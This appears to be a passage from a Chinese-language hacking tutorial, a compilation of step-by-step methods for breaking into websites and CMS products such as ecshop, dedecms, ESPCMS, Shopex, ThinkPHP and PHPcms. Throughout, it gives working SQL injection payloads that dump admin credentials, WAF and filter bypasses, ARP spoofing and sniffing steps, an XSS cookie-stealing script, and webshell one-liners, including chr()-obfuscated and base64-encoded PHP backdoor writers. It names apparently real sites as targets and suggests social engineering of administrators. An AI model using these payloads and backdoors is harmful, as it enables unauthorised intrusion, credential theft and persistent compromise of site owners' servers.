然后就会出现两个提示数字比如5跟6然后在代码的5跟6处猜帐号密码常见的帐号有user username 密码:pass password 复制修改后的代码放到浏览器里打开就会爆破出网站的帐号密码了。 第二种方法 注入点 http://www.XXXXXXXX.gov.cn/shownews.asp?id4098 首先把?id408去掉然后访问如果提示“数据库出错”就说明网站没有过滤Cookie提交方式可以利用Cookie欺骗绕过防注入 利用Cookie提交变量值代码javascript:alert(document.cookie”id”escape(“4098″) 下面开始在Cookie注入中执行常规注入攻击提交代码javascript:alert(document.cookie”id”escape(“4098 and 11″)); 访问 http://www.XXXXXXXX.gov.cn/shownews.asp 显示正常页面 再提交代码javascript:alert(document.cookie”id”escape(“4098 and 12″)); 显示错误页面 下面来开始猜解表段提交代码javascript:alert(document.cookie”id”escape(“4098 and exists (select * from 表段)”)) 接着猜字段提交代码javascript:alert(document.cookie”id”escape(“4098 and exists (select 字段 from admin)”)) 例如username 接着猜字段提交代码javascript:alert(document.cookie”id”escape(“4098 and exists (select 字段 from admin)”)), 例如password 下面开始猜字段数跟字段内容了提交代码:javascript:alert(document.cookie”id”escape(“4098 and 12 union select 1,2,3,4,5,6 from 表段”)); 一直猜解到对为止这里只是猜到6记得继续加减猜解到对的时候页面会出现数字然后在相对应的数字替换字段名再进行提交代码 这时如果字段名猜对的话就会爆出帐号密码了不对的话继续替换字段名位置不变存在cookie注入时建议参考mysql手工注入的语句 【 伪静态注入 】 伪静态网站注入方法莱鸟扫盲来了哦通常情况下动态脚本的网站的url类似下面这样 http://www.91ri.org/news.php?id111 做了伪静态之后就成这样了 http://www.91ri.org/news.php/id/111.html 以斜杠“/”代替了“”并在最后加上.html这样一来就无法直接用工具来注入了。 常规的伪静态页面如下 http://www.XXX.com/play/Diablo.html 例如关联的动态页面是game.php 那么当用户访问后程序会自动转换成类似 http://www.XXX.com/game.php?actionplaynameDiablo的形式 注入点检测可以用 http://www.XXX.com/play/Diablo‘ and 1’1.html与 http://www.XXX.com/play/Diablo‘ and 1’2.html来判断 通常情况下动态脚本的网站的url类似下面这样 http://www.xxoo.net/aa.php?id123 做了伪静态之后类似这样 http://www.xxoo.net/aa.php/id/123.html 以斜杠“/”代替了“”并在最后加上.html这样一来就无法直接用工具来注入了 【 嗅探 】 当入侵一个网站该网站没有任何漏洞的情况下可以进行旁注再提权拿下任意一台服务器不行的话就C段提权拿下任意一台服务器。 只要能拿下同网段的任意一台服务器就可以使用C段嗅探来获取主站的帐号密码cain是一款强大的劫持工具。 在服务器里安装cain后打开主控端点击配置-选择服务器IP一项-在路由追踪一项取消全部-确定。 设置完毕后点击一下激动按钮(中间那个)再点击嗅探器点击加号符号选择所有在子网主机选择ARP测试(传播 31-位)确定。 扫描完毕选择网关一项点击ARP点击加号符号左边选择网关右边选择全部的C段确定点击开始嗅探按钮(第三个)嗅探到的帐号密码在口令一项展现 如果发现没数据可以使用幻境网盾来限制网速让cain的发包快过防火墙。 【 arp欺骗 】 只要该服务器存在C段都可以尝试arp欺骗用到的工具是NetFuke想知道arp劫持能不能成功cmd命令arp -a 看一下动态的服务器IP就能成功静态的就不能。 安装完运行主控端设置–嗅探设置–网卡选择服务器的IP–控制选项选择“启用ARP欺骗、启用过滤器、启用分析器、启用修改器、主动转发” 确定。 设置–ARP欺骗–双向欺骗–来源Ip填服务器的网关–中间人IP填服务器的IP–目标IP填要欺骗的任意C段ip(用御剑扫描C段)–确定。 插件管理–修改器–最后一个选项双击–在右边的HTML Body [haha!!] 填写自己要展现的文字点击开始即可欺骗成功 【 突破安全狗防注入及上传 】 写入webshell 写不进去平常的一句话 也失效用这段代码 % Page Language”C#” ValidateRequest”false” % %try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[admin163.net].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }% 连接端用cncert的aspx一句话客户端 2、IIS6.0解析漏洞遇到安全狗 文件名为 http://www.baicai.com/1.asp;1.jpg 这样的会被IIS安全狗果断屏蔽 改成如下名称,IIS6一样会解析: www.baicai.com/;1.asp;1.jpg 3、安全狗的注入绕过 常用的如baicai.asp?id1 and 11 是会被安全狗屏蔽的。 但这样就可以突破了 baicai.asp?0day5.com%00.id69%20 and 11 【 跨站xss 】 在网站留言或者能输入信息的地方提交跨站代码从而盗取管理员cookie然后用cookie浏览器直接进入后台将以下代码保存为asp文件例如1.asp %thisfileServer.MapPath(“cookie.txt”)msgRequest(“msg”)set fsserver.CreateObject(“scripting.filesystemobject”)set thisfilefs.OpenTextFile(thisfile,8,True,0)thisfile.WriteLine(“cookie:”msg”by:剑眉大侠”)thisfile.closeset fsnothing% 首先搭建一个asp环境推荐使用“ASP服务器摆脱安装IIS” 再将1.asp放在wwwroot目录下访问1.asp文件如果提示下载则说明搭建成功了。 然后在留言板的“您的网站”一处输入scriptdoucument.location’ http://127.0.0.1/1.asp?msg‘document.cookie/script 当管理员浏览我们提交的留言时将在wwwroot目录下生成一个cookie.txt文件这时我们只要访问cookie.txt这个文件就能知道管理员的cookie是多少了 然后再使用桂林老兵的cookie欺骗工具或是网页源代码查看分析器访问网站再输入cookie进行欺骗登录即可填cookei的时候记得选择自定义 小技巧要想让管理员早点浏览你提交的留言可以通过打电话QQ客服等去社工他即可。 【 爆库 】 %5C为十六进制的\符号而数据库大于5.0就可以爆库若一个网站数据库大于5.0且是ACESS数据库若不能注入的注入点是 http://www.xxx.com/rpc/show24.asp?id127 我们直接把%5C加到rpc后面因为%5C是爆二级目录所以应该是这样 http://www.xxx.com/rpc%5c/show24.asp?id127 而%23是代表#如果管理员为了防止他人非法下载数据库而把数据库改成#database.mdb,这样防止了。 如果页面地址为 http://www.xx.com/rpd/#database.mdb ; 把%23替换#就可以下载了即 http://www.xx.com/rpd/%23database.mdb 还有利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径也可以得到数据库的路径注意这里的/也要换成%5c 如果你能看到’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确以及是否连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行. 【 利用sql注入点判断网站和数据库是否站库分离 】 在注入点后加上and exists(select * from admin where 1(Select (case when host_name()servername then 1 else 0 end))) 注意admin一定要是存在的表段如果返回正常说明网站和数据库是在同一服务器如果不正常则说明是站库分离的。 【 iis6.0 PUT写入漏洞 】 利用工具IIS PUT Scaner、桂林老兵IIS写权限利用程序 1、IIS来宾用户对网站文件夹有写入权限 2、web服务器扩展力设置webDAV为允许即WebDAV—打勾 3、网站主目录:写入—打勾(可PUT) 4、网站主目录:脚本资源访问—打勾可COPY、MOVE 大家都清楚写权限就是允许PUT与网站自身运行的权限无丝毫联系如果开启了就是没有一点安全意识就给我们提供了大大的方便。 首先用御剑工具扫下C段比如12.12.12.1 – 12.12.12.255 打开IIS PUT Scaner把12.12.12.1放在Start IP 这里12.12.12.255放在End IP 这里 接着在Port这里换成80点击Scan开始嗅探当PUT这里显示是Yes就说明存在漏洞可以右键选择PUT file输入文件名1.txt下面填内容保存就可以写入了。 或是利用“桂林老兵IIS写权限利用程序”也可以这款工具比较强大把域名填写进去例如www.xxx.com然后在请求文件那里输入你的文件名 在数据包格式那里选择PUT有的会直接弹出浏览文件框没有就自己选择在下面然后点击提交数据库即可一般是先PUT一个txt文件再MOVE成asp木马。 直接提交asp木马的话如果MOVE方法不行可以试试Copy。 【 ACCESS执行SQL语句导出一句话拿webshell 】 原理大致和php网站的outfile差不多在access后台其他方法不能拿到webshell但是后台有SQL语句查询执行就可以直接access导出一句话拿webshell了。 不过需要知道物理路径才能导出利用IIS的解析漏洞导出EXCEL文件拿到webshell因为ACCESS数据库不允许导出其他危险格式我们导出为EXCEL后在利用IIS解析漏洞就可以变成我们的木马了。 点“服务器信息探测”获得网站路径e:\web\webshellcc\的EXCEL 点“系统管理”-》“自定义执行SQL”试一下能够执行的话可以用access导一句话拿下shell。 create table cmd (a varchar(50)) 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50 insert into cmd (a) values (‘%execute request(chr(35))%’) 在表cmd的a字段插入密码为#的一句话木马 select * into [a] in ‘e:\web\webshellcc\1.asa;x.xls’ ‘excel 4.0;’ from cmd 把cmd表a的内容导出到路径e:\web\webshellcc\的EXCEL文件 drop table cmd 删除建立的cmd表 菜刀连接 http://www.xxx.com/1.asa;x.xls 【 利用过滤’or’or’修改代码进行绕过 】 例如后台地址是 http://www.hdminc.net/admin/admin_index.asp 当用万能密码登录的时候会出现一些过滤or的提示 请右键查看源文件另存为桌面 XX.html然后打开找到以下这段代码进行删除 script language”javascript” function chencklogin() { if(document.login.username.value”) {alert(‘请输入用户名’); document.login.username.focus(); return false } if (document.login.password.value”) {alert(‘请输入密码’); document.login.password.focus(); return false } } /script 注意将以下段代码中的 “index.asp?actionchkadmin” 修改为 “ http://www.hdminc.net/admin/admin_index.asp“ form action”index.asp?actionchkadmin” name”login” method”past” οnsubmitreturn checklogin();” 最后保存打开再用’or’or’登录时系统已不再过滤结果就能用万能密码登录进去了 【 动力3.5拿shell 】 inurl:printpage.asp?ArticleID 1.找到版权信息把内容替换成 版权所有 Copyright? 2003 a href’ http://www.asp163.net‘动力空间/a” ‘版权信息 if Request(“xiaoxin”)”520″ then dim allen,creat,text,thisline,path if Request(“creat”)”yes” then Set fs CreateObject(“Scripting.FileSystemObject”) Set outfilefs.CreateTextFile(server.mappath(Request(“path”))) outfile.WriteLine Request(“text”) Response.write “小新恭喜” end if Response.write “form method’POST’action’”Request.ServerVariables(“URL”)”?xiaoxin520creatyes’” Response.write “textarea name’text’”thisline”/textareabr” Response.write “input type’text’ name’path’ value’”Request(“path”)”‘” Response.write “input name’submit’ type’submit’ value’ok’ /form” Response.end end if % 2.然后保存千万别跳转任何页面直接在IE地址栏内将 admin/Admin_Login.asp 替换成 inc/config.asp?xiaoxin520 3.成功后会进入一个像小马一样的页面粘贴木马代码以及写上木马文件名即可拿到wshell木马在inc目录。 【 动易cms拿shell 】 点击网站配置在网站名称后面插入一句话木马连接inc/config.asp 【 aspcms】 简要描述后台文件AspCms_AboutEdit.asp 未进行验证且未过滤导致SQL注入。 爆帐号密码 admin/_content/_About/AspCms_AboutEdit.asp?id1 and 12 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid1 版本不同需要更改值。 第二种方法找到后台然后/admin/_system/AspCms_SiteSetting.asp?actionsaves 直接POST [php]runMode1siteMode1siteHelp%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0 SwitchComments1SwitchCommentsStatus1switchFaq0:Yrequest(chr(35)):execute(Y)SwitchFaqStatus0dirtyStrwaterMark1 waterMarkFonthahahahawaterMarkLocation1smtp_usermailaspcmstest%40163.comsmtp_useraspcmstestsmtp_passwordaspcms.cn smtp_serversmtp.163.comMessageAlertsEmail13322712%40qq.commessageReminded1orderReminded1applyReminded1commentReminded1 LanguageID1[/php] 再连接配置文件config.asp 密码为# 老版本中可以通过添加模板直接添加asp.但是新版已经限制了添加模板的格式为html,js,css 当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的. 方法点击“界面风格”然后选“编辑模板/CSS文件”然后“添加模板”文件名称写error.asp;.html文件内容写一句话%eval request(“g”)% 然后添加会提示添加成功然后在模板列表中就可以找到我们添加的一句话了用菜刀连接即可 可是如果遇到iis7.5呢? 以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法. 1、进入后台“扩展功能”–“幻灯片设置”–”幻灯样式” 2、使用chorme的审查元素功能或者firefox的firebug总之使用能修改当前页面元素的工具就好了将对应的slidestyle的value的值修改为1%%Eval(Request (chr(65)))%% 3、一句话木马密码a。在/config/AspCms_Config.asp 【 XYCMS企业建站系统 】 关键词inurl:showkbxx.asp?id 默认数据库data/xy#!123.mdb 默认账户密码admin admin 找到网站配置在网站名称里面直接插入一句话网站”%%eval request(“x”)%%’注意不要删掉网站名称然后中国菜刀连接/inc/config.asp 或是找到网站地址在http://后面加上一句话木马然后菜刀链接配置文件inc/config.asp 【 szwyadmin漏洞绕过后台验证 】 关键字:inurl:szwyadmin/login.asp javascript:alert(document.cookie”adminuser”escape(“‘or’or’”));javascript:alert(document.cookie”adminpass”escape(“‘or’or’”));javascript:alert(document.cookie”admindj”escape(“1″)); 1.后台一般存在一个szwyadmin文件夹复制一下后台地址放在一边之后复制代码替换后台地址访问进行注射 2.这时会弹出一个窗口连续点击三次确定。 3.重新访问后台地址把网站后面的/login.asp 换成 admin_index.asp 奇迹般的直接进入后台了 【 医院建站系统任意文件上传漏洞 】 关键词inurl:cms/Column.aspx? 关键词inurl:cms/Column.aspx?LMID 漏洞利用 xtwh/upfile.aspx 直接上传aspx木马拿shell。 【 Struts 2远程执行命令漏洞 】 struts 2一种java-web的MVC框架技术和传统的struts1有很大的改进。 严格来说这其实是XWork的漏洞因为Struts 2的核心使用的是WebWork而WebWork又是使用XWork来处理action的。 关键词inurl:common/common_info.action?wid http://www.xxxxx.com/xxx.action 一般页面以.action结尾的几乎都存在这个漏洞可以用工具检测一下就知道了。 这个漏洞是在Java运行环境下利用的Java运行环境下载地址 http://www.orsoon.com/Soft/12080.html 【 嘉友科技cms上传漏洞 】 谷歌关键字inurl:newslist.asp?NodeCode 程序采用的上传页uploadfile.asp未进行管理验证导致建立畸形目录上传图片木马获取shell漏洞。 expploadfile.asp?uppathmad.aspupnameuptextform1.mad.asp 他原上传目录是:uploadfile.asp?uppathPicPathupnameuptextform1.PicPath 而且他的上传文件没有过滤导致未授权访问直接上传小马然后小马后面写为1.jpg 访问路径 查看源代码。 【 ecshopcms后台拿shell 】 支持最新2.7.2版本通杀最新版本后台低权限 ?php $filenchr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filecchr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62); $achr(119); $fpfopen($filen,$a); $msgfwrite($fp,$filec); if($msg) echo chr(79).chr(75).chr(33); fclose($fp); ? 后台-订单管理-订单打印-选择源代码编辑-保存-返回订单列表随意选择一个订单打印返回OK生成一句话成功-在根目录生成了一个null.php一句话密码usb 【 phpcms2008版本 直接执行php代码漏洞 】 关键字inurl:yp/product.php exp代码pagesize${${eval_r($_POST[cmd])}} 测试网站 http://www.slsdgc.com.cn/yp/product.php?catid721 利用方法 http://www.slsdgc.com.cn/yp/product.php?pagesize${${eval_r($_POST[cmd])}} 菜刀连接 http://www.slsdgc.com.cn/yp/product.php?pagesize${${eval_r($_POST[cmd])}} 密码cmd 菜刀连接注意以下格式 默认级别 php gb2312 【 教育站sql注入通杀0day 】 关键词inurl:info_Print.asp?ArticleID 默认后台website/ad_login.asp 比如 http://www.psfshl.pudong-edu.sh.asp?ArticleID1650 加上union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin 这样就直接得到了管理员账户和经过Md5加密的密码了。 【 IIS7.0 畸形解析漏洞通杀oday 】 找到某个使用IIS7.0架设的站然后找到其中的图片上传点不需要管理权限普通注册用户即可搞定把PHP一句话图片木马缀改成.jpg传上去得到图片地址。 在图片格式后面添加xx.php xx随便你怎么填只要后缀为.php就好之后菜刀连接即可 【 Yothcms 遍历目录漏洞 】 优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。 默认后台admin/login.asp 遍历目录ewebeditor/manage/upload.asp?id1dir../ 数据库路径%23da%23ta%23\%23db_%23data%23%23.asa 【 传信网络独立开发网站源码0day漏洞 】 默认后台system/login.asp 编辑器后台路径ubbcode/admin_login.asp 数据库路径ubbcode/db/ewebeditor.mdb 默认账号密码yzm 111111 【 科讯cms 6.5后台拿shell 】 1.可以在数据库备份中找到网站的绝对路径 2.利用科讯SQL注入漏洞利用工具也能找到 进入后台后执行sql命令create table E:\wenxiushi\wz001\\KS_Data\Collect\KS_Collect.Mdb.cmd (a varchar(50))insert into E:\wenxiushi\wz001\KS_Data\Collect\KS_Collect.Mdb.cmd (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾’) 接着数据库备份成1.asp 菜刀连接密码# 【 动易2006后台拿shell 】 进入后台后我们在左边菜单栏中选择“系统设置”然后在出现的菜单栏里选择“自定义页面管理” 接着需要先添加一个自定义页面分类选择“添加自定义分类”这个选项分类名称与分类简介都可以随便填写。填写完毕后选择“添加”系统提示添加成功。 下面再来选择“添加自定义页面”“页面名称”随便输入“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管保持默认. 不过如果没有改页面路径的话默认生成的文件是在根目录下的也就是 http://www.xx.com/maer.asp.“文件名称”即输入生成的木马的文件名。 “页面简介”也不用管下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。 选择“自定义页面管理首页”点击右边出现的“生成本页”就OK 了成功获得动易的shell。 【 Shopex4.8.5 注入漏洞后台拿shell 】 关键词powered by shopex v4.8.5 exp: html head titleShopex 4.8.5 SQL Injection Exp/title /head body h2Shopex 4.8.5 SQL Injection Exp (product-gnotify)/h2 form action” http://www.lpboke.com/?product-gnotify” method”post” name”submit_url” input type”hidden” name”goods[goods_id]” value”3″ input type”hidden” name”goods[product_id]” value”1 and 12 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators” input type”submit” value” /form fuck body /html 保存为html格式替换代码中的网站本地打开后点击小图标出现新页面帐号密码爆出来了默认后台shopadmin 拿shell方法…. 第一步 页面管理 修改模版 然后选一个XML编辑 开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来 然后改包 id1273923028-info.xmltmpid1273923028nameindex_temp.phpfile_source 解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid 你们懂的 就是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门或者shel 我这里是一句话 你们懂的 然后提交了之后 地址是这样的 http://Madman.in/themes/文件名称/你的木马名称 【 ecshop漏洞总汇 】 关键字powered by ecshop 普通代码user.php?actorder_queryorder_sn’ union select 123456concat(user_name0x7cpassword0x7cemail)8 from ecs_admin_user/* 变种代码search.php?encodeYToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 直接在网站后台加入代码回车就能爆出帐号密码再去掉代码加上/admin回车就能直接进后台了。 拿shell方法很简单找到“库项目管理”再选择“配送的方式”在代码最下面插入php一句话木马?php eval($_POST[x]);? 不行就换php木马的预代码 接着保存一句话路径是 http://www.xxx.org/myship.php ; 打开“ASPPHP两用Shell.html”填入地址点击一下环境变量成功之后点击上传文件就可以拿shell了。 【 ESPCMS通杀0day 】 关键字inurl:index.php?acarticleatreaddid 默认后台adminsoft/index.php 或者 admin/ 注入点(爆表前缀比如cm_admin……前缀就是cm后面3个代码要自行替换): index.php?acsearchattaglisttagkey%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schemadatabase() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 爆用户名 index.php?acsearchattaglisttagkey%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 爆密码 index.php?acsearchattaglisttagkey%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 密码和用户一次性爆 index.php?acsearchattaglisttagkey%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 拿shell 进到后台后直接点击分类图片修改选择文件直接上传一句话木马 PS 当上传不了php网马时去系统设置一下添加图片上传格式 |php 这样就可以上传一个图片文件头的网马。 【 帝国cms 6.6最新版本 】 自定义页面-增加自定义页面-随便写个.php文件名内容写script language”php”echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4”);/script 如果内容直接添一句话或者php大马是无用的因为他会生成xxx.php前先给你执行 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4 就是 ?php eval($_POST[cmd]);? 的base64加密。 所以生成xxx.php后 会出现内容 ?php eval($_POST[cmd]);? 在文件里然后用菜刀直接连接吧。 【 phpweb 】 关键字inurl:down/class/index.php?myord 后台地址admin.php 万能密码admin ‘or ’1′’1 注入地址down/class/index.php?myord1 表段pwn_base_admin 拿shell通杀漏洞登入后台–文章–文章发布–文章内容里的图片上传按钮–抓包之后改包NC提交。 也可以用下面的exp拿shell 用火狐浏览器登录后台因为火狐浏览器有保留cookies的功能 找到“phpweb之exp”这个html拉进火狐浏览器器里上传1.php;.jpg的一句话木马查看源码菜刀连接 【 动科(dkcms)漏洞分析 】 官方网站www.dkcms.com 主要是差不多3个版本为主吧 V2.0 data/dkcm_ssdfhwejkfs.mdb V3.1 _data/___dkcms_30_free.mdb V4.2 _data/I^(()UU()H.mdb 默认后台admin 编辑器admin/fckeditor 由此可见官方安全意识挺差的至于后台拿shellfck编辑器突破可拿shell 建立asp文件夹 Fck的路径Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?CommandCreateFolderTypeImageCurrentFolder/mk.aspNewFolderNamemk.asp 【 ESPCMS通杀0day 】 百度关键字inurl:index.php?acarticleatreaddid 默认后台adminsoft/index.php 注入点(爆表前缀)index.php?acsearchattaglisttagkey%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schemadatabase() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 爆帐号index.php?acsearchattaglisttagkey%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 爆密码index.php?acsearchattaglisttagkey%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 帐号和密码一次性爆index.php?acsearchattaglisttagkey%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 进到后台后直接点击分类图片-修改-选择文件-直接上传php一句话木马 PS当上传不了php木马时去系统设置一下添加图片上传格式 |php 这样就可以上传一个图片文件头的php木马。 【 Thinkphp框架任意代码执行漏洞 】 ThinkPHP是一款国内使用比较广泛的老牌PHP MVC框架官方已经发布修复漏洞的补丁地址 http://thinkphp.cn/down-116.html 关键字thinkphp intitle:系统发生错误 获取Thinkphp的版本号index.php/module/action/param1/$%7Bprint(THINK_VERSION)%7D 获取服务器的配置信息index.php/module/aciton/param1/${phpinfo()} 列出网站所有文件列表index.php/module/action/param1/{${system($_GET[x])}}?xls -al 直接在网页执行一句话index.php/module/action/param1/{${eval($_POST[s])}} 菜刀连接 http://www.xxx.com/index.php/module/action/param1/{${eval($_POST[s])}} 密码s 【 良精系统 】 ( 爆管理员帐号密码的代码 ) NewsType.asp?SmallClass’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%2012%20and%20”’ 一句话木马的妙用 插入一句话木马后连接网站的配置文件inc/config.asp 密码都是g 1.网站配置-允许的上传文件类型-插入闭合的一句话木马”%%eval request(“g”)%%s” 不行就增加一个cer格式之后上传cer格式的木马即可 2.网站配置-网站地址-插入闭合的一句话木马http://”%%execute(request(“g”))%%’ 3.网站配置-网站名称-插入闭合的一句话木马沧州临港彩越化工有限公司”%%eval request(“g”)%%s” 4.网站配置-版权信息-插入闭合的一句话木马”%%eval(request(chr(103)))%%’ 5.本方法适用于access数据库只要在access数据库任何地方插入┼攠數畣整爠煥敵瑳∨≡┩ 再将mdb备份成asp或者asa访问这个asp或asa就是一句话木马。 利用upfile_other.asp漏洞拿shell 直接访问会员中心userreg.asp 注册一个用户并在未退出登录的状态下使用双文件上传工具足以爆它菊花以下代码保存为1.html并里面的修改目标站第一个上传jpg第二个上传cer HTMLHEAD META http-equivContent-Type content”text/html; charsetgb2312″ STYLE typetext/cssBODY { FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee } .tx1 { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px } /STYLE META content”MSHTML 6.00.2800.1400″ nameGENERATOR/HEAD BODY leftMargin0 topMargin0 FORM nameform1 action” http://www.xxx.com/upfile_other.asp“; methodpost encTypemultipart/form-dataINPUT typefile size30 nameFileName INPUT typefile size30 nameFileName1 INPUT style”BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal” typesubmit value上传 nameSubmit INPUT idPhotoUrlID typehidden value0 namePhotoUrlID /FORM/BODY/HTML 另外可以利用会员中心的cookies用火狐浏览器登陆之后访问upfile_other.asp页面用抓包工具去抓包接着用明小子上传拿shell. 上传漏洞 漏洞文件Upfile_Photo.asp 前提是进入后台了访问这个文件将提示“请先选择你要上传的文件”用抓包工具抓管理员的cookies再把上传地址跟cookies扔到名小子里上传拿shell 南方在线编辑器 默认后台admin/Southidceditor/admin_style.asp 数据库路径admin/SouthidcEditor\Datas\SouthidcEditor.mdb 遍历目录admin/Southidceditor/admin_uploadfile.asp?id14dir../.. 文件上传页面admin/Southidceditor/ewebeditor.asp?id57stylesouthidc 样式设置页面admin/SouthidcEditor/Admin_Style.asp?actionstylesetid47 【 dedecms最新注入漏洞及找后台技巧 】 访问这个plus/search.php?keywordastypeArr[ uNion ]a 看结果如果提示Safe Alert: Request Error step 1 ! 那么直接用下面的exp爆出所有管理员的帐号密码plus/search.php?keywordastypeArr[111%3D\)and(SELECT1FROM(selectcount(*),concat(floor(rand(0)*2),(substring((selectCONCAT(0x7c,userid,0x7c,pwd)from%23__adminlimit0,1),1,62)))afrominformation_schema.tablesgroupbya)b)%23\]a 看结果如果提示Safe Alert: Request Error step 2 ! 那么直接用下面的exp爆出所有管理员的帐号密码 a198654 plus/search.php?keywordastypeArr[111%3D\)UnIonseleCt1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42from%23__admin%23\]a 有些/plus/目录换成了/plugins/目录这时就要把/plus/换成/plugins/进行注射了 破解出md5为20位结果只需要把前三位和后一位去掉剩余16位拿去解密即可 如何找后台 默认后台dede 第一种方法data/mysql_error_trace.inc 有时可以爆出路径 第二种方法把域名作为后台去尝试 第三种方法查看这个文件robots.txt 第四种方法ping下域名获得ip之后 http://www.bing.com/ 搜索ip:127.0.0.1 php 可能获得后台也可以获得其他旁注站一般dede的旁站很多也是dedecms的 【 PHPcms V9 爆数据库信息漏洞】 直接爆出数据库连接信息/index.php?msearchcindexapublic_get_suggest_keywordurlasdfq../../phpsso_server/caches/configs/database.php 关于后台拿webshell进入后台后点击界面–模版风格–随便找个页面点击修改插入我们的一句话代码 ? $fp fopen(“0day.php”, ‘a’); fwrite($fp, ‘’.?php’.”\r\n\r\n”.’eval($_POST[0day])’.”\r\n\r\n?”.”\r\n”); 点击保存接着点击可视化代码就成功执行了接着菜刀连接/0day.php密码0day
